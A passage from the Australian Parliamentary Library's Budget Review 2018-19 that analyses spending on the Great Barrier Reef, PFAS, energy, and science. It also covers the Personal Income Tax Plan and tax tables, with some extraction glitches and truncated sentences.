⢠$6.0 million to the Australian Institute of Marine Science and CSIRO to scope and design a research and development (R&D) program for coral reef restoration.
⢠$10.4 million to accelerate the control of crown-of-thorns starfish (COTS) by increasing the number of vessels targeting COTS from three to eight.
⢠$36.6 million to further reduce polluted water entering the Reef.
⢠$4.9 million to increase the number of field officers to improve compliance and provide an early warning of coral bleaching.78
In April 2018 the Government announced a $443.3 million Reef Trust partnership with the Great Barrier Reef Foundation (with money administered through the Department of Environment) to tackle COTS, reduce pollution flowing into the Reef and mitigate the impacts of climate change.79 The funding will be:
⢠$201.0 million to support farming practices that improve water quality flowing into the Reef.
⢠$100.0 million to support R&D on reef restoration, reef resilience and adaptation.
⢠$58.0 million to expand the control of COTS.
⢠$45.0 million to increase community engagement, such as Indigenous traditional knowledge for sea country management, coastal clean-up days and awareness-raising.
⢠$40.0 million to enhance reef health monitoring and reporting to facilitate better management.80
While the initial $57.9 million is to be spent over the next 18 months there is little information about the period over which the rest of the funds will be spent.81 The Great Barrier Reef Marine Park said that it will receive an additional $42.7 million for its joint field management program over the next six years.82
Interested parties have welcomed the additional funding for the Reef but some don’t feel the funds are enough to protect it, and they criticised the Government for not providing additional
77. The budget figures have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018. 78.. 79.. 80. Ibid.
81. M Turnbull, M Cash and J Frydenberg, op. cit. 82. Great Barrier Reef Marine Park Authority, $500 million funding “game changer” for the Great Barrier Reef, media release, 29 April 2018.
Budget Review 2018-19 23
money for actions to mitigate climate change itself rather than just to mitigate the impacts.83 The federal Department of the Environment and Energy stated that ‘climate Change is the most significant threat to the Great Barrier Reef’.84 The chair of the Reef 2050 Advisory Committee,
Penny Wensley, said that both global warming and cyclones had contributed to the Reef's ill health and that funding was still not enough, although it was more than the committee had hoped for.85
Enhancing Australia’s Biosecurity System The 2017 Intergovernmental Agreement on Biosecurity Review stated that the erosion of biosecurity budgets is hampering the efforts of biosecurity agencies, and that funding needs to be more sufficient, more sustainable and better directed.86.87.88 The levy represents one per cent of the current cost of importing a container.89 It would appear the Government has decided not to implement the recommended levy on aircraft containers.
Per- and Poly-Fluorinated Alkyl Substances (PFAS).
83.].
84. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.6: Environment and Energy Portfolio, p. 56. 85. L Rebgetz and L Gartry, ‘Great Barrier Reef to get $500m to tackle pollution and breed more resilient coral’, ABC News, 29 April 2018. 86. W Craik, D Palmer and R Sheldrake, Priorities for Australia’s biosecurity system: An independent review of the capacity of the
national biosecurity system and its underpinning Intergovernmental Agreement, Canberra 2017, pp. 1-2. 87. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.1: Agriculture and Water Resources Portfolio, p. 20. 88. Department of Agriculture and Water Resources (DAWR), ‘Biosecurity import levy’, DAWR website. 89. Ibid.
Budget Review 2018-19 24
The Government will provide $34.1 million over five years from 2017-18 for research into the remediation of PFAS contamination through the establishment of the $13 million PFAS Remediation Research Program and for the Department of the Environment and Energy.90
There is debate about the health effects of PFAS due to the limited evidence presently available. The US Environmental Protection Agency states that ‘there is evidence that exposure to PFAS can lead to adverse health outcomes in humans’.91’.92 In 2017, the Department of Health released daily guidance values for PFAS in drinking water.93.
90. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 81. 91. United States Environmental Protection Agency (EPA), ‘Basic information on PFAS’, EPA website. 92. Department of Health, Expert Health Panel for PFAS: Summary, April 2018. 93. Department of Health (DoH), ‘Health-based guidance values for PFAS for use investigations in Australia’, DoH website.
Budget Review 2018-19 25
Energy Dr Emily Hanna
Energy is a significant issue for parliament, with discussion since the last Budget focusing on the reliability and security of the electricity system as well as the inclusion of renewable sources into our energy mix. Significantly, since the last Budget, the Independent Review into the Future
Security of the National Electricity Market - Blueprint for the Future (the Finkel Review) has been published and the National Energy Guarantee (NEG) introduced.94 The states and Commonwealth have been in dispute over levels of renewable energy that should be included in our energy supply, and the Council of Australian Governments (COAG) Energy Council has not reached agreement on the NEG.95
This Budget has two main energy measures. These relate to the acquisition of Snowy Hydro Limited and further funding of $41.5 million over six years from 2018-19 to broaden the ‘Powering Forward’ initiative.96 The latter, which was introduced in the 2017-18 Mid-Year Economic and Financial Outlook, aims to deliver ‘more affordable, reliable and sustainable energy’.97
Snowy Hydro Acquisition Snowy Hydro Limited is an operational power company, which was jointly owned by the governments of New South Wales (NSW), Victoria, and the Commonwealth, with share allocations of 58%, 29% and 13% respectively. It features ‘16 power stations with a combined generation capacity of 5,500 megawatts, including the Snowy Mountains Hydro Electricity Scheme, and … more than one million retail customers’.98 The Australian Government will soon become the sole shareholder, due to an agreement reached with the two states to transfer their shareholdings to the Commonwealth in July 2018.99 In return, NSW and Victoria will receive $4.2 billion and $2.1 billion respectively in funds for infrastructure.100 This arrangement appears as a new capital appropriation worth $6.1 billion for the Department of the Environment and Energy (DEE), paid for in 2017-18 using ‘capital appropriation and interim dividends payable from Snowy Hydro Limited in respect of their profits for the half year period to 31 December 2017’.101 This purchase was reported in The Australian in March as being ‘excluded from the budget bottom line’ with the asset ‘classified as a government business, “off the books”, similar to the Western Sydney Airport and NBN Co’.102 The report claims that, nevertheless, this will ‘add to the nation’s debt, with the government increasing its borrowings to fund the multi-billion dollar deal’.
After the transfer of shares in July this year, all future dividends from Snowy Hydro Limited will go to the Australian Government, and therefore the forward estimates show the acquisition creating revenue for the Commonwealth of $1.1 billion over four years from 2018-19.103 This is an increase
94. A Finkel, K Moses, C Munro, T Effeney and M O’Kane, Independent Review into the Future Security of the National Electricity Market - Blueprint for the Future (the Finkel Review), Commonwealth of Australia, 2017; M Turnbull (Prime Minister) and J Frydenberg (Minister for the Environment and Energy), National energy guarantee to deliver affordable, reliable electricity, media release, 17 October 2017.
95. COAG Energy Council, Meeting Communique, 20 April 2018. 96. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Portfolio Budget Statements 2018-19: Budget Related Paper No. 1.6: Environment and Energy Portfolio, pp. 20-21, 23.
97. Australian Government, Budget Measures: Budget Paper No. 2: 2018-19, pp. 99, 201-202; Australian Government, Mid-Year Economic and Fiscal Outlook 2017-18, p. 150. 98. Australian Government, Portfolio Budget Statements 2018-19: Budget Related Paper No. 1.6: Environment and Energy Portfolio, p. 7. 99. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 7. 100. M Turnbull (Prime Minister), S Morrison (Treasurer) and J Frydenberg (Minister for the Environment and Energy), Historic
Snowy Deal, media release, 2 March 2018. 101. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 87. 102. G Chambers, ‘States to reap $6bn in Snowy buyout [Turnbull's $6bn Snowy buyout]’, The Australian, 2 March 2018, pp. 1, 7. 103. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 76.
Budget Review 2018-19 26
in earnings from the shares of $941.1 million over the four years.104 In addition, the Commonwealth will no longer need to compensate Victoria and NSW for their relative shares of income tax paid by Snowy Hydro Limited, reducing Department of the Treasury expenses by $225 million over three years from 2019-20 ($75 million per year).105
The Budget includes no further funding specifically for Snowy Hydro or the Snowy 2.0 scheme (estimated in the Snowy 2.0 feasibility study to have a base cost of $3.8-4.5 billion).106 However, this is likely due to the Government reporting that the feasibility study found ‘Snowy Hydro can finance the project itself using retained earnings and borrowing’.107
‘Powering Forward’ program ‘Powering Forward - delivering more affordable, reliable and sustainable energy’ is a measure designed to ‘support long-term energy affordability, security and governance’. Funding of $11.7 million over five years from 2017-18 is provided ‘to support recommendations from the Finkel Review and the Energy Security Board’, including establishing the Government’s current energy and emissions reduction policy, the NEG, and ‘developing a distributed energy register to improve and lower the costs of system security and grid management, and allow consumers to receive a benefit from their demand reduction’.108 In addition, the measure aims to improve the functionality of the gas market, with funding of ‘$2.5 million over two years from 2018-19 to improve gas pipeline regulations, and to improve the national gas law and rules’. The development and implementation of the NEG will also continue with funding of $7.5 million for the Council of Australian Governments Energy Council’s ‘agreed work program’ over two years from 2018-19.109 Episodic assessments of national energy security and resilience are also funded, with $12.8 million over six years from 2018-19 as well as a further $4.9 million every three years from 2024-25 (with no end date given for this commitment).110 These assessments will include the recently announced investigation into Australia's domestic liquid fuel security.111
As well as coming under DEE’s Energy program (program 4.1), the Powering Forward measure is listed as part of DEE’s programs 2.1 and 2.2, Reducing Australia’s Greenhouse Gas Emissions and Adapting to Climate Change, respectively.112 This appears to be the only place in the Budget where new funds related to climate change are provided:
⢠$0.9 million over two years ‘to undertake modelling for a long-term whole-of-economy emissions reduction strategy as recommended by … the Finkel Review’113 and
⢠$6.1 million over three years (from 2018-19) ‘to improve climate change information for the energy sector’.114
The Treasurer used the Budget speech to reaffirm the Government’s commitment to an emissions reduction target of 26-28 percent on 2005 levels by 2030. He stated:
104. Budget Measures: Budget Paper No. 2: 2018-19, op. cit., p. 202. 105. Ibid. 106. Snowy 2.0 Short Feasibility Study Report, Snowy Hydro Limited 2017, p. 25.
107. M Turnbull (Prime Minister) and J Frydenberg (Minister for the Environment and Energy), Green Light for Snowy Hydro 2.0, media release, 21 December 2017. 108. The Finkel Review, op. cit.; Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 23. 109. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., p. 23. 110. Ibid. 111. J Frydenberg (Minister for the Environment and Energy), Budget delivers for energy, reef and environment, media release,
8 May 2018. 112. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., pp. 60-61. 113. Ibid., p. 20. 114. Ibid., p. 21.
Budget Review 2018-19 27
‘…we will not adopt the 50 per cent renewable energy target demanded by the Opposition’ and ‘[a]ll energy sources and technologies should support themselves without taxpayer subsidies. The current subsidy scheme will be phased out from 2020’. 115
This is reflected in the absence of extra funding for the Emissions Reduction Fund (ERF), which has approximately $265 million left.116 The Clean Energy Finance Corporation, which under the Clean Energy Finance Corporation Act 2012 had its last financial year of legislatively prescribed funding of $2 billion last year, will receive $530 million in 2018-19 from DEE—only about one quarter of its previous year payment.117
Commentary The majority of commentary around the energy-related parts of the Budget relates to the absence of new funding, and concerns the lack of extra funds for the ERF may make it harder to achieve the national emissions reduction target.118 The chief executive of the Carbon Market Institute, Peter Castellas, is reported as saying that without more ERF-funded abatement, ‘the need for the Safeguard Mechanism and the National Energy Guarantee to do the heavy lifting of emissions reduction’ is elevated.119 The Climate Council stated that ‘Budget 2018 … fell short on new funding to embrace the rollout of clean, affordable and reliable renewable energy and storage technology’.120 Environmental and climate groups were also generally disappointed in the lack of funding for climate change.121
115. Scott Morrison (Treasurer), Budget speech 2018-19, p. 82. 116. Department of the Environment and Energy (DEE), ‘Emissions Reduction Fund Update’, DEE website. 117. Portfolio Budget Statements 2018-19, Environment and Energy Portfolio, op. cit., pp. 27, 161; Clean Energy Finance Corporation Act 2012, section 46.
118. ‘No Budget top-up for Emissions Reduction Fund’, Footprint, 8 May 2018. 119. Ibid. 120. Climate Council, ‘Budget blow: No cash to tackle climate change’, 9 May 2018, Climate Council website. 121. For example, Australian Conservation Foundation (ACF), ‘Budget 2018-19: Investment in a healthy environment cut to bare
bones, while fossil fuel subsidies continue’, 8 May 2018, ACF website and Climate Council, op. cit.
Budget Review 2018-19 28
Science and technology Dr Hunter Laidlaw
A number of budget measures affect the science and technology sector and these have generally been met with stakeholder enthusiasm. Support for many of the main programs is relatively steady or modestly improved, while a number of new initiatives are funded—perhaps most notably the establishment of a domestic space agency. Many of these initiatives fall under the Australian Technology and Science Growth Plan; this will also be discussed under the ‘Innovation Incentives’ topic.
Space agency The Budget provides $26.0 million over four years to establish a national space agency to oversee and coordinate domestic space activities.122 An additional $15.0 million over three years from 2019-20 is also allocated to an International Space Investment initiative to generate opportunities for strategic space projects; however the design of this initiative has not yet been finalised.123 These expenditures are designed to boost Australia’s involvement in the space sector and to help break further into the global space market. This funding secures the commitment made by the Government in September 2017 to establish a space agency.124 A review of Australia’s space industry capabilities commenced in 2017 and the report was delivered to the Government on 29 March 2018; it has not yet been released.125 A number of states and territories have expressed interest in hosting the agency and additional details are eagerly anticipated.126
Science and research funding Funding for Commonwealth research agencies appears to be relatively stable across the sector, although the overall picture will become clearer when the Science, Research and Innovation Budget Tables are released later in the year. The Commonwealth Science and Industrial Research Organisation (CSIRO) received a 5% increase in funds.127 The Australian Research Council (ARC) received higher than expected funding for key programs including the Discovery program (2.5% increase) and Linkage program (2.7% increase) compared with the 0.2% increase indicated in last year’s forward estimates.128 There are no unexpected changes to total appropriation for the ARC or the National Health and Medical Research Council (NHMRC) compared with previous forward estimates. A Bill to amend and update the funding caps for the ARC was introduced into Parliament on the 10 May 2018.129
The Antarctic Gateway Partnership will be extended and an Antarctic Science Collaboration Initiative will be established with $35.7 million over four years through the ARC, however this will be met using existing funds from the ARC and the Department of Industry, Innovation and Science.
122. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018. 123. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.13A: Jobs and Innovation Portfolio, p. 44. 124. M Cash (Acting Minister for Industry, Innovation and Science), Turnbull Government to establish national space agency, media
release, 25 September 2017. 125. Department of Industry, Innovation and Science (DIIS), ‘Review of Australia’s Space Industry Capability’, DIIS website. 126. A Wicht, ‘Budget 2018: space agency details still scant - but GPS and satellite imagery funded’, The Conversation, 8 May
2018; SBS, ‘Australia will explore a new frontier with the establishment of a national space agency’, SBS News, 9 May 2018. 127. Increase calculated using 2017-18 Estimated Actual total funds from Government compared to 2018-19 Estimate from Portfolio budget statements 2018-19, Jobs and Innovation Portfolio, op. cit., p. 115. 128. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.5: Education and Training Portfolio,
pp. 120-121; Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.5: Education and Training Portfolio, p. 149. 129. Parliament of Australia, ‘Australian Research Council Amendment Bill 2018 homepage’, Australian Parliament website.
Budget Review 2018-19 29
Approximately $4.5 million over four years has also been allocated to encourage more women into science, technology, engineering and mathematics (STEM) education and careers.
Medical Research Future Fund (MRFF) Accumulation of capital in the Medical Research Future Fund (MRFF) remains on track for the fund to reach $20 billion by 2020-21. Budget papers indicate a 2017-18 balance of $7.1 billion, with the fund to increase to $9.5 billion next financial year.130 Disbursements are still expected to rise each year. Two broad announcements for the MRFF were in the Budget: investments in health and medical research, and an Industry Growth Plan for the sector. The Growth Plan aims to ‘improve health outcomes and develop Australia as a global destination for medical sector jobs, research and clinical trials’ by providing $1.3 billion over ten years. Specific initiatives include $500.0 million over ten years for precision medicine and genomics (the Genomics Health Futures Mission) and $248.0 million for an expanded clinical trial programs. Research programs were also announced that will receive $275.4 million from the MRFF, including $75.0 million over four years to extend the Rapid Applied Research Translation program.
In contrast to most other science grant funding mechanisms (such as those administered through the ARC and NHMRC), the government determines the programs and funding amounts to be disbursed from the MRFF, following advice provided by the Australian Medical Research Advisory Board and taking into consideration the Australian Medical Research and Innovation Strategy (set every five years) and the Australian Medical Research and Innovation Priorities (set ever two years).131 The sector is looking forward to more details on the competitive processes to be used when allocating these research funds.132
Technology Besides funding for the space agency, the Budget also provides support for space-related technologies, particularly GPS and satellite imagery. Improvements to GPS through more comprehensive positioning, navigation and timing (PNT) data received significant funds: $160.9 million over four years for PNT data to the resolution of ten centimetres across all of Australia, and $64.0 million over four years to the resolution of three to five centimetres in near real-time for regional and metropolitan areas with mobile phone coverage. Additional ongoing funding is also provided from 2022-23 (total of $50.9 million across both initiatives). More reliable and standardised satellite imagery data will also be developed with $36.9 million over three years from 2019-20 (and $12.8 million ongoing) through Digital Earth Australia.
Advanced computing technology received a boost with $70.0 million to assist with upgrades of supercomputing infrastructure at the Pawsey Supercomputing Centre in Western Australia, to help the Centre maintain its position in the Top500 global supercomputer list and attract international research. Australia’s capabilities in Artificial Intelligence (AI) and Machine Learning will also be strengthened through investment of $29.9 million over four years. The funds will support projects through the Cooperative Research Centres Program, additional postgraduate scholarships and school-level programs, and additional planning for AI technology including a national ethics framework.
130. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.7: Finance Portfolio, pp. 32. 131. Department of Health (DoH), ‘How does MRFF funding work?’, DoH website; DoH, ‘How is the MRFF governed?’, DoH website. 132. Association of Australian Medical Research Institutes (AAMRI), $2 billion MRFF investment secures Australia’s future as
medical research leader, media release, 8 May 2018.
Budget Review 2018-19 30
Research infrastructure The National Collaborative Research Infrastructure Strategy (NCRIS) will be expanded and receive an additional $393.3 million over five years from 2017-18. The NCRIS provides partial funding for national research infrastructure projects that are intended to generate maximum benefit to the research sector and broader community. This brings total funding under the Research Infrastructure Investment Plan to $4.1 billion over 12 years ($1.9 billion of this total is announced in the Budget). A 2015 review proposed that $6.6 billion ($3.7 billion from government) was required to support long term investment in national research infrastructure.133 The National Research Infrastructure Roadmap, completed in 2016, identifies nine focus areas as priority sectors for investment.134 The Roadmap specifically identified the Pawsey Supercomputing Centre (noted above) as an immediate priority.135
Capital works within CSIRO have been allocated $341.5 million over nine years; this will be met from existing resources and the planned disposal of part of CSIRO’s property portfolio.136 Property, plant and equipment sales are expected to generate $141.4 million over the forward estimates.137 The only specifically noted capital works relate to maintaining regulatory requirements at the Australian Animal Health Laboratory in Geelong, Victoria, the highest level biosecurity containment laboratory in the country.
Reaction The science and technology measures announced in the Budget have received a relatively enthusiastic reception from sector representatives.138 This contrasts with previous budgets that have been met with a mixed reaction.139 Establishment of a space agency has been welcomed by both industry lobby groups and the broader scientific community, although some have questioned whether the level of funding for the new agency will be sufficient to boost the local industry into the highly competitive world market.140
133. Research Infrastructure Review, Final report, September 2015, DET website. 134. Australian Government, 2016 National Research Infrastructure Roadmap, February 2017. 135. Ibid., p. 43. 136. Portfolio budget statements 2018-19, Jobs and Innovation Portfolio, op. cit., p. 116; Budget measures: budget paper no. 2:
2018-19, op. cit., p. 205. 137. Portfolio budget statements 2018-19, Jobs and Innovation Portfolio, op. cit., p. 131. 138. Association of Australian Medical Research Institutes (AAMRI), 2018-19 Federal Budget - what’s in it for medical research?,
media release, 8 May 2018; Australian Academy of Science, Good outcomes for science in Budget 2018, media release, 8 May 2018; Research Australia, Budget 2018-19: Budget analysis, media release, 8 May 2018; Science & Technology Australia, STEM a standout winner in this year’s budget, media release, 8 May 2018; Universities Australia, Budget boosts for research infrastructure & regions a downpayment on future prosperity, media release, 8 May 2018. 139. Science & Technology Australia, From the 2017/18 Federal budget lockup, media release, 9 May 2017; D Brett, ‘Science and
research funding’, Budget review 2015-16, Research paper series, 2014-15, Parliamentary Library, Canberra, 2015; K Loynes, ‘Science and innovation’, Budget review 2016-17, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016; A St John, ‘Science, research and innovation’, Budget review 2017-18, Research paper series, 2016-17, Parliamentary Library, Canberra, 2017. 140. Space Industry Association of Australia (SIAA), Space funding in the 2018 budget, media release, 9 May 2018; D Sadler, ‘Just
$26m for new space agency’, InnovationAus.com website, 8 May 2018.
Budget Review 2018-19 31
Personal income tax cuts and the Medicare levy Phillip Hawkins
The Treasurer, Scott Morrison, announced the Government’s Personal Income Tax Plan (PITP) in the 2018-19 Budget.141 The PITP reduces personal income taxes over the next seven years through a combination of changes to tax offsets for low and middle income earners and changes in income tax thresholds. The changes will be implemented over three steps, commencing in 2018- 19, 2022-23 and 2024-25. The 2018-19 changes are targeted at low and medium income earners, with the changes in 2022-23 and 2024-25 applying to individuals on higher taxable incomes.
The Government also announced in the Budget that it will not proceed with its proposal to increase the Medicare levy from 2 per cent to 2.5 per cent to fund the National Disability Insurance Scheme (NDIS).
Impact of the PITP Figure 1 indicates the dollar value of total tax reductions provided under each stage of the PITP by taxable income. This demonstrates:
⢠the changes commencing in the 2018-19 income year are beneficial across all taxable incomes. However, the benefit is larger for those individuals with taxable income below $125,333
⢠the changes commencing in the 2022-23 income year primarily provide additional tax reductions to individuals with taxable incomes over $90,000
⢠the changes commencing in the 2024-25 income year primarily provide an additional tax reduction to individuals with taxable income over $120,000
Figure 1: Combined impact of PITP changes (tax reduction per annum ($) by taxable income in 2018-19, 2022-23 and 2024-25)
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018.
141. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 33-34.
Budget Review 2018-19 32
Why is the Government taking this approach? While the approach taken by the Government adds some complexity to the personal income tax system, utilising tax offsets to provide most of the income tax reductions in 2018-19 means that the initial tax cuts can be targeted to low and middle income earners. Tax offsets, as described further below, can be limited to taxpayers at particular taxable income levels and phased out for higher income earners.
In contrast, changes in income tax thresholds cannot be targeted in the same way. Australia’s progressive tax system applies higher marginal tax rates to income above particular income thresholds (zero for the first $18,200, 19 per cent between $18,200 and $37,000 and so on). This means that lifting an income tax threshold reduces the amount of tax paid by anyone with taxable income above that threshold. For example, increasing the tax threshold for the 32.5 per cent marginal tax rate from $87,000 to $90,000 benefits all individuals with taxable income over $87,000, not just those earning between $87,000 and $90,000. Anyone with taxable income above $87,000 would pay 32.5 per cent on any taxable income between $87,000 and $90,000 rather than the current 37 per cent.
Tax Offsets
142. Tax offsets may be non-refundable or refundable, the difference being that a non-refundable tax offset can only reduce the amount of tax that someone pays to zero in a financial year. Refundable tax offsets can reduce the amount of tax antax liability to an amount less than zero, which results in a refund
What is a tax offset? In order to understand the Government’s PITP it is important to understand tax offsets and how they differ from tax deductions.
Both deductions and offsets are ultimately used to reduce a taxpayer’s tax liability, but they operate differently:
⢠deductions, such as expenses incurred in earning assessable income, are applied at the start of the tax return calculation to reduce an individual’s taxable income (the base to which the person’s marginal tax rate applies)
⢠in contrast, tax offsets are applied at the end of the tax return calculation to directly reduce an individual’s tax liability.
The following is a simplified example (it ignores the Medicare levy):
An individual has assessable income of $100,000, work-related deductions of $30,000 and non-refundable tax offsets of $10,000.142
⢠the person’s taxable income is $70,000 ($100,000 less $30,000 of deductions)
⢠the tax amount on a taxable income of $70,000 (before offsets are applied) would be $14,297 based on 2016-17 marginal tax rates
⢠after the $10,000 tax offset is applied the individual’s tax liability for the year would be $4,297
⢠if the taxpayer was entitled to a tax offset of $15,000, then their tax liability would be zero (if the offset is a non-refundable one) or $703 (if the offset were a refundable one ($14,297 - $15,000))
Given that the Australian Tax Office (ATO) collects personal income tax throughout the year (income tax withholding), and deductions and offsets are effectively applied when the ATO processes a tax return (on assessment), an individual may be entitled to a refund of tax paid throughout the year.
Budget Review 2018-19 33
Low and middle income tax offset (LAMITO) In the 2018-19 income year a new Low and Middle Income Tax Offset (LAMITO) will be introduced. The LAMITO is a non-refundable tax offset of up to $530 per annum for resident taxpayers with a taxable income of up to $125,333. It will be applied as a lump-sum amount on assessment. The LAMITO will commence in the 2018-19 income tax year and will be in place for 4 years until 2021-22 (at which time other tax changes will effectively ‘lock-in’ these tax cuts).
LAMITO will provide the following tax benefit:143
⢠individuals earning up to $37,000 will receive a LAMITO amount of up to $200 per annum 144
⢠individuals earning more than $37,000 but less than $48,000 will have their LAMITO amount increased from $200, by 3 cents in the dollar, to a maximum rate of $530
⢠individuals earning between $48,000 and $90,000 will receive the maximum value of LAMITO of $530
⢠individuals earning more than $90,000 will have their LAMITO amount reduced by $1.5 cents in the dollar until it phases out entirely for incomes of $125,333 and above.
LAMITO is provided in addition to the existing Low-Income Tax Offset (LITO) which provides an offset of up to $445 for individuals earning less than $37,000, and reduces by 1.5 cents in the dollar for every dollar over $37,000 until it phases out entirely for incomes over $66,667. Figure 2 illustrates the combined amount of LAMITO and LITO available for the 2018-19, 2019-20, 2020- 21 and 2021-22 income years.
Figure 2. LAMITO and LITO for the 2018-19, 2019-20, 2020-21 and 2021-22 income years
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and ATO website.
143. Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018, p. 4. 144. Because LAMITO and LITO are non-refundable, the maximum amount of LAMITO and LITO that can be claimed will be limited to the person’s tax liability prior to applying the offset.
Budget Review 2018-19 34
Low-income tax offset In the 2022-23 income year the LAMITO will be rolled into the existing LITO and the LITO will be increased from $445 to $645 per year. The new LITO, as illustrated in Figure 3, will provide the following tax offset amount:145
⢠individuals earning up to $37,000 will receive a LITO amount of up to $645 (equal to the combined amount of LITO and LAMITO in previous years)
⢠individuals earning between $37,000 and $41,000 will have the new LITO amount reduced by 6.5 cents in the dollar for each dollar of income above $37,000 until their income reaches $41,000
⢠individuals earning over $41,000 will have their LITO amount reduced further by 1.5 cents in the dollar until it phases out entirely for individuals earning more than $66,667.
There are no further proposed changes to these tax offsets in the third step commencing from the 2024-25 income year.
Figure 3: Maximum LITO amount from 2022-23 onwards
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018.
Tax thresholds The PITP also makes changes to income tax thresholds in three steps in 2018-19, 2022-23 and 2024-25. These changes predominately affect middle and high income earners.
⢠in the 2018-19 income year the threshold for the 32.5 per cent marginal tax rate will increase from $87,000 to $90,000146
⢠in the 2022-23 income year the threshold for the 32.5 per cent marginal tax rate will increase from $90,000 to $120,000147
⢠the final change in 2024-25 income year will abolish the 37 per cent tax bracket entirely and extend the marginal tax rate of 32.5 per cent to all taxable incomes between $40,001 and $200,000.148
145. Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018, p. 7. 146. Ibid., p. 13. 147. Ibid., pp. 13-14. 148. Ibid., p. 14.
Budget Review 2018-19 35
As changes in income tax thresholds will change the amount that the ATO withholds from individuals income, these tax cuts will effectively be provided throughout the year instead of on assessment (as with tax offsets).
The new proposed income tax schedules under each step (as estimated by the Parliamentary Library) are included at Attachment A.
Financial Impact According to the 2018-19 Budget Papers the proposed PITP is estimated to reduce revenue by $13.4 billion over the Budget forward estimates period.149 However, the forward estimates period does not include the changes scheduled to commence in 2022-23 and 2024-25. The Government has confirmed that the estimated cost of the proposal over 10 years will be $140 billion but has stated a year by year estimate of this figure would be unreliable.150
Legislation The Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 (the Bill), which seeks to implement the Government’s PITP was, introduced into the House of Representatives on 9 May 2018. The Bill seeks to implement all elements of the PITP. The Treasurer has confirmed that the Government will seek to legislate all elements of the PITP in the same Bill.151 This is despite reported calls from the Opposition and other cross-bench senators to consider each set of changes separately.152
ALP position The Australian Labor Party (ALP) has announced that it will support the introduction of the PITP changes that commence in 2018-19; namely the introduction of the LAMITO and the increase in the 32.5 per cent tax rate threshold to $90,000.153
The ALP has also announced that from the 2019-20 income year they would provide a permanent tax offset with a maximum amount of $928 per year for individuals with taxable income less than $125,000, $398 more than the maximum amount of LAMITO.154
Not proceeding with the increase in the Medicare Levy In the 2018-19 Budget the Government announced that it would no longer proceed with its plan (announced in the 2017-18 Budget)155 to increase the Medicare levy. This is expected to reduce Government revenue by $12.8 billion over the forward estimates period. In a speech to Australian Business Economists on 26 April 2018 the Treasurer stated that the increase in the Medicare levy was no longer needed as a result of the better fiscal position outlined in the Budget.156 The Government has indicated that it intends to fully fund the NDIS by ‘continuing to deliver a stronger economy and by ensuring the Government lives within its means.’157 The ALP has also stated that it would not proceed with its proposal to increase the Medicare levy for individuals with taxable income greater than $87,000.
149. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 33-34. 150. S Morrison (Treasurer), Interview with Barrie Cassidy, ABC Insiders, transcript, 13 May 2018. 151. Ibid. 152. AAP, ‘Pressure on coalition to split tax plan’, SBS News, 11 May 2018. 153. B Shorten (Leader of the Opposition) and Chris Bowen (Shadow Treasurer), Tax Refund For Working Australians - Bigger,
Better & Fairer, Media release, 10 May 2018 154. Ibid. 155. Australian Government, Budget measures: budget paper no. 2: 2017-18, pp. 24-25. 156. S Morrison (Treasurer), ‘Lower taxes for a stronger economy: address to the Australian Business Economists’, Sydney, 26 April
2018.
157. Ibid.
Budget Review 2018-19 36
Attachment A: Proposed personal income tax rates for resident individuals under the PITP158 Table 1: Personal income tax rates applying in the 2017-18 income year
Taxable income Tax on this taxable income
$0 - $18,200 Nil
$18,201 - $37,000 19 cents for each $1 over $18,200
$37,001 - $87,000 $3,572 plus 32.5 cents for each $1 over $37,000
$87,001 - $180,000 $19,822 plus 37 cents for each $1 over $87,000
$180,001 and over $54,232 plus 45 cents for each $1 over $180,000
Source: ATO website.
Table 2: Personal income tax rates applying in the 2018-19, 2019-20, 2020-21 and 2021-22 income years
Taxable income Tax on this taxable income
$0 - $18,200 Nil
$18,201 - $37,000 19 cents for each $1 over $18,200
$37,001 - $90,000(a) $3,572 plus 32.5 cents for each $1 over $37,000
$90,001(a) - $180,000 $20,797 plus 37 cents for each $1 over $90,000
$180,001 and over $54,097 plus 45 cents for each $1 over $180,000
(a) $87,000 threshold raised to $90,000 from 2018-19 income year
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and explanatory memorandum.
Table 3: Personal income tax rates applying in the 2022-23 and 2023-24 income years
Taxable income Tax on this income
$0 - $18,200 Nil
$18,200 - $41,000(a) 19 cents for each $1 over $18,200
$41,001(a) - $120,000(b) $4,332 plus 32.5 cents for each $1 over $41,000
$120,001(b) - $180,000 $30,007 plus 37 cents for each $1 over $120,000
$180, 001 and over $52,207 plus 45 cents for each $1 over $180,000
(a) $37,000 income threshold raised to $41,000 from 2022-23 income year
(b) $90,000 income threshold raised to $120,000 from 2022-23 income year
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and explanatory memorandum.
158. The following tables do not include the impact of the Medicare levy.
Budget Review 2018-19 37
Table 4: Personal income tax rates applying from the 2024-25 income onwards
Taxable income Tax on this income
$0 - $18,200 Nil
$18,201 - $41,000 19 cents for each $1 over $18,200
$41,001 - $200,000(a) $4,332 plus 32.5 cents for each $1 over $41,000
37 cents in the dollar threshold abolished*
